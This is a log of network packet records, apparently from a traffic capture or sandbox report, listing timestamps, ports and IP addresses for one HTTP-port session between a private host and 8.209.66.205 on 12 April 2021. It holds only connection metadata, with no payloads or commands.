Apr 12, 2021 15:12:20.051601887 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051623106 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051660061 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051670074 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051675081 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051696062 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051733971 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051748037 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051753998 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051781893 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051824093 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051831007 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051836014 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051861048 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051898003 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051908970 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051913977 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051935911 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051971912 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051986933 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051991940 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052009106 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052046061 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052057981 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052062035 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052094936 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052135944 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052143097 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052148104 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052172899 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052211046 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052222013 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052227020 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052248955 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052284956 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052303076 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052309990 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052323103 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052350044 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052361012 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052406073 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052407980 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052411079 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052449942 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052486897 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052500010 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052505016 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052525997 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052551031 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052563906 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052601099 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052613974 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052619934 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052639008 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052676916 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052689075 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052695036 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052725077 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052750111 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052767992 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052804947 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052834034 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052839041 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052843094 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052881002 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052887917 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052896023 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052917957 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052954912 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.052967072 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052973032 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.052997112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053044081 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053046942 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053050995 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053087950 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053126097 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053143978 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053148985 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053164005 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053201914 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053214073 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053219080 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053237915 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053276062 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053286076 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053291082 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053312063 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053333044 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053359985 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053431988 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053437948 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053442001 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053487062 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053524971 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053541899 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053549051 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053564072 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053601980 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053612947 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053618908 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053649902 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053694010 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053715944 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053719997 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053746939 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053783894 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053788900 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053792953 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053822994 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053839922 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053858995 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053896904 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053910017 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053915024 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053935051 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.053956985 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.053982019 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054023981 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054038048 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054042101 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054061890 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054100037 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054111004 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054116964 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054137945 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054176092 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054187059 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054207087 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054213047 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054244041 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054281950 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054313898 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054321051 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054321051 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054357052 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054367065 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054371119 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054394007 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054411888 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054430962 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054445028 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054477930 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054519892 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054527998 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054533005 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054557085 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054586887 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054595947 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054632902 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054651022 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054657936 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054676056 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054713011 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054725885 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054738998 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054750919 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054764032 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054797888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054840088 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.054888010 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.054893017 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.068721056 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.068766117 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.068850994 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.068875074 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098596096 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098658085 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098695040 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098743916 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098750114 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098773003 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098777056 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098787069 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098824978 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098839998 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098845959 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098862886 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098901033 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098912954 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098917961 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098937988 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098977089 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.098989964 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.098994017 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099014997 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099054098 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099071026 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099116087 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099147081 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099159956 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099164009 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099188089 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099195957 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099200010 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099226952 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099258900 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099298000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099304914 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099308968 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099330902 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099335909 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099374056 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099412918 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099430084 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099435091 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099437952 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099461079 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099503994 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099541903 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099580050 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099617958 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099654913 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099693060 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099730015 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099736929 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099745989 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099777937 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099819899 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099837065 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099843025 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099857092 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099895000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.099910975 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099916935 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.099981070 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100039959 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100043058 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100047112 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100083113 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100121021 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100142002 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100147009 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100171089 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100214005 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100228071 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100233078 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100250006 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100287914 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100305080 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100308895 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100356102 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100397110 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100418091 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100425959 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100435972 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100460052 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100472927 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100534916 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100536108 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100543022 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100574970 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100611925 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100631952 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100637913 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100647926 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100684881 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100693941 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100709915 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100737095 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100775003 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100786924 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100792885 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100812912 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100851059 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100862980 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100867987 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100888014 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100927114 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.100938082 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100943089 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.100964069 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101011038 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101013899 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101020098 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101052046 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101090908 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101104975 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101109028 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101128101 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101166964 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101177931 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101182938 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101203918 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101241112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101253986 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101262093 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101279020 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101325035 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101329088 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101334095 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101366997 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101412058 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101418972 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101433992 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101470947 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101509094 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101524115 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101530075 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101547003 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101584911 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.101594925 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.101599932 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.102047920 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145342112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145375013 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145418882 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145442963 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145457029 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145466089 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145474911 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145478010 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145490885 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145524025 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145528078 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145670891 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145697117 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145725965 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145730019 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145735979 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145752907 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145776033 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145783901 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145788908 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145801067 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145824909 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145833015 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145838022 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145848036 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145872116 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145886898 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145891905 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145895004 CEST	80	49720	8.209.66.205	192.168.2.5
